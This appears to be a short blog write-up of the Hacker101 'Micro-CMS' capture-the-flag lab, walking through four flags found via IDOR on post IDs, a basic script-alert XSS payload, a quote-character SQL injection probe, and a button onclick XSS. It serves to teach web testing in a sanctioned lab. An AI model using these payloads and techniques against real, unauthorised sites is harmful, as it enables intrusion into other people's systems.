.png)
6 months ago
49 BOOK THIS SPACE FOR AD
ARTICLE AD
Overview
Tested URL: [Micro-CMS](https://7a7f7727a8dbd56088a8f16ee801cbb1.ctf.hacker101.com/)
Application:Micro-CMS
Objective: Find all 4 flags
Unlike the previous challenge, this machine has four flags, making it more engaging.
Steps
1. Starting the Machine:
I started the machine and navigated to the target URL.
2. Exploring URLs:
Following advice from a researcher on YouTube Some Live recon video, I opened all URLs in new tabs for further testing.
3. Testing URLs:
— Markdown Test:
I noticed a post ID at the end of the URL, suggesting that modifying it might lead to other posts. Changing the ID led to a “Forbidden” page, indicating potential for further testing.
I experimented with different IDs. Using ID 6, which also resulted in a “Forbidden” page, but persistence paid off and I found a flag through Insecure Direct Object Reference (IDOR).
Flag 1obtained through IDOR.
4. Creating a Test Page:
I created a test post to understand the web application’s behavior. While it didn’t initially reveal anything interesting, it added a post to the homepage, setting the stage for more experiments.
5. XSS Attempt:
I injected a simple XSS payload using the script: `<script>alert(1)</script>`. This worked successfully.
6. SQL Injection:
Although I’m a novice at bug hunting, I attempted SQL injection on the edit page by using `’` or `` ` `` in the parameters. This also worked, revealing another flag.
7. Advanced XSS Testing:
The final flag required a more sophisticated XSS attack. Inspired by hints from various forms, I realized that XSS could be embedded in a button. I modified the button code in the Markdown Test to:
```html
<button onclick=”alert(‘flag’)”>Click me</button>
```
Clicking the button triggered the alert, but it didn’t reveal a flag. However, inspecting the source code accidentally revealed the final flag.
Conclusion
With all four flags captured, this challenge demonstrated the importance of persistent testing and exploring different attack vectors.
Thank you!
My Twitter/X :- https://x.com/0xfxiii
Bengali (Bangladesh) · 
English (United States) ·